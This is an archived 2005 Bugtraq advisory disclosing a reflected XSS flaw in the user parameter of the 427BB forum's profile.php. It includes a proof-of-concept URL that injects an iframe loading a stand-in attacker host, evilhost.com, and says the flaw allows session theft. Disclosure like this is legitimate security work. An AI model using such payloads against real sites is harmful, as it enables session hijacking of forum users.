Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: 427BB profile.php XSS vulnerability.

427BB profile.php XSS vulnerability.

From: Raven <raven_at_tgs-security.com>
Date: 1 Mar 2005 00:37:06 -0000
('binary' encoding is not supported, stored as-is)  [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
 []
 [] HRG - Hackerlounge Research Group
 [] Release: HRG007
 [] Monday 03/01/05
 [] 427BB
 []
 [] The author can't be held responsible for any
damage
 [] done by a reader. You have your own resonsibility
 [] Please use this document like it's meant to.
 []
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
  
 Vulnerable: 427BB (Any Version)
  
  
 ---
  
 General Information:
  
 427BB Is a simple board and I have no idea why I'm
releasing this because Its Very unpopular But I said
What the hell. Its based on PHP And MySQL
  
 ---
  
 Description:
  
 In profile.php there is a user var that is
vulnerable to a XSS attack by a remote attacker. The
user string isn't filtered of < > or ". This makes is
very easy for a attacker to steal a session and many
other things.
  
 ---
  
 PoC Code
 Place the following code into the the url then
reload the profile page and it will execute this
code.
  
 profile.php?user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E
  
 This is very unsafe and vuln because you can execute
any code you would like and can lead to manger damage
of the forum you are attacking.
  
 ---
  
 Fix and Vendor status:
  
Vendor has been notified, expect official patch soon.
  
 ---
  
Greetz:
 
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
 
Th3_R_at_v3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
 
 
---
 
Credit:
 
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
 
Partial credit is also given to
lancastertechnologies.org, founded by JWT.
 
 
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
 []
 [] HRG - Hackerlounge Research Group
 [] Release: HRG007
 [] Monday 03/01/05
 [] 427BB
 []
 [] The author can't be held responsible for any
damage
 [] done by a reader. You have your own resonsibility
 [] Please use this document like it's meant to.
 []
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
Received on Mar 01 2005
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos